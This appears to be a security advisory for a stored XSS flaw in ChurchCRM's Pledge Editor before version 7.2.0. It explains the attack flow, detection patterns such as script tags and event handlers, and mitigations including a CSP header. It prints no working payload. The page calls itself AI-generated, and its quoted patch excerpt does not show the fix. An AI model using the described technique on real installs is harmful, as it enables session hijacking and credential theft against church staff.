CVE-2026-40483 Overview
ChurchCRM, an open-source church management system, contains a stored Cross-Site Scripting (XSS) vulnerability in the Pledge Editor component. In versions prior to 7.2.0, the application renders donation comment values directly into HTML input value attributes without proper escaping via htmlspecialchars(). This allows an authenticated user with Finance permissions to inject HTML attribute-breaking characters and event handlers into the comment field. The malicious payload is stored in the database and executes in the browser of any user who subsequently opens the pledge record for editing.
Critical Impact
Authenticated attackers can execute arbitrary JavaScript in victim browsers, potentially leading to session hijacking, credential theft, or unauthorized actions performed on behalf of other ChurchCRM users with access to pledge records.
Affected Products
- ChurchCRM versions prior to 7.2.0
- ChurchCRM Pledge Editor component (src/PledgeEditor.php)
Discovery Timeline
- 2026-04-18 - CVE CVE-2026-40483 published to NVD
- 2026-04-20 - Last updated in NVD database
Technical Details for CVE-2026-40483
Vulnerability Analysis
This vulnerability is classified as CWE-79 (Improper Neutralization of Input During Web Page Generation). The core issue lies in the Pledge Editor's handling of user-supplied comment data when rendering HTML forms. When a user with Finance permissions creates or edits a pledge record, the comment field value is inserted directly into an HTML input element's value attribute without proper output encoding.
The absence of htmlspecialchars() or equivalent sanitization allows an attacker to break out of the attribute context using characters like double quotes (") and inject arbitrary HTML attributes including JavaScript event handlers such as onfocus, onmouseover, or onclick.
Root Cause
The root cause is improper output encoding in the src/PledgeEditor.php file. User-controlled input from the comment field is echoed back into HTML without being processed through PHP's htmlspecialchars() function or similar encoding mechanisms. This violates the security principle of always encoding output based on the context in which it is rendered.
Attack Vector
The attack requires network access and an authenticated session with Finance permissions within ChurchCRM. The attacker crafts a malicious comment containing JavaScript code wrapped in event handlers. Once saved, any subsequent user viewing or editing that pledge record will trigger the XSS payload in their browser context.
Example attack flow:
- Attacker with Finance permissions creates a pledge with a malicious comment
- Comment contains attribute-breaking characters and event handlers
- Payload is stored in the database
- Victim user opens the pledge for editing
- Malicious JavaScript executes in the victim's browser session
use ChurchCRM\model\ChurchCRM\Family;
use ChurchCRM\model\ChurchCRM\FamilyQuery;
use ChurchCRM\model\ChurchCRM\Pledge;
+use ChurchCRM\model\ChurchCRM\PledgeQuery;
use ChurchCRM\Utils\FiscalYearUtils;
use ChurchCRM\Utils\FunctionsUtils;
use ChurchCRM\Utils\InputUtils;
Source: GitHub Commit Changes
Detection Methods for CVE-2026-40483
Indicators of Compromise
- Unusual pledge comment entries containing HTML special characters such as ", <, >, or '
- Pledge comments containing JavaScript event handlers like onclick, onerror, onfocus, or onmouseover
- Database entries in pledge tables with embedded script tags or encoded JavaScript
- User reports of unexpected browser behavior when viewing pledge records
Detection Strategies
- Review ChurchCRM database pledge tables for comments containing suspicious patterns such as <script, javascript:, or HTML event attributes
- Implement Web Application Firewall (WAF) rules to detect XSS payloads in form submissions targeting pledge-related endpoints
- Monitor application logs for unusual activity from users with Finance permissions
- Deploy browser-based XSS detection tools or Content Security Policy (CSP) violation reporting
Monitoring Recommendations
- Enable detailed logging for all pledge creation and modification events
- Configure alerts for database entries containing common XSS patterns
- Implement CSP headers with report-uri directive to capture attempted XSS executions
- Regularly audit user accounts with Finance permissions for suspicious activity
How to Mitigate CVE-2026-40483
Immediate Actions Required
- Upgrade ChurchCRM to version 7.2.0 or later immediately
- Audit existing pledge records in the database for any malicious payloads
- Review Finance permission assignments and remove unnecessary access
- Implement Content Security Policy headers to reduce XSS impact
Patch Information
ChurchCRM has addressed this vulnerability in version 7.2.0. The fix ensures proper HTML encoding of user-supplied values before rendering them in HTML contexts. For detailed patch information, refer to the GitHub Security Advisory GHSA-wjmf-w8gj-rx7g and the related pull request.
Workarounds
- If immediate upgrade is not possible, manually sanitize the pledge comment field in src/PledgeEditor.php by wrapping output with htmlspecialchars($comment, ENT_QUOTES, 'UTF-8')
- Restrict Finance permissions to only trusted administrator accounts until the patch is applied
- Implement a WAF rule to block requests containing XSS patterns in pledge form fields
- Deploy CSP headers with strict script-src directives to prevent inline script execution
# Example: Add CSP header in Apache configuration
# Add to .htaccess or virtual host configuration
Header set Content-Security-Policy "default-src 'self'; script-src 'self'; object-src 'none';"
Disclaimer: This content was generated using AI. While we strive for accuracy, please verify critical information with official sources.
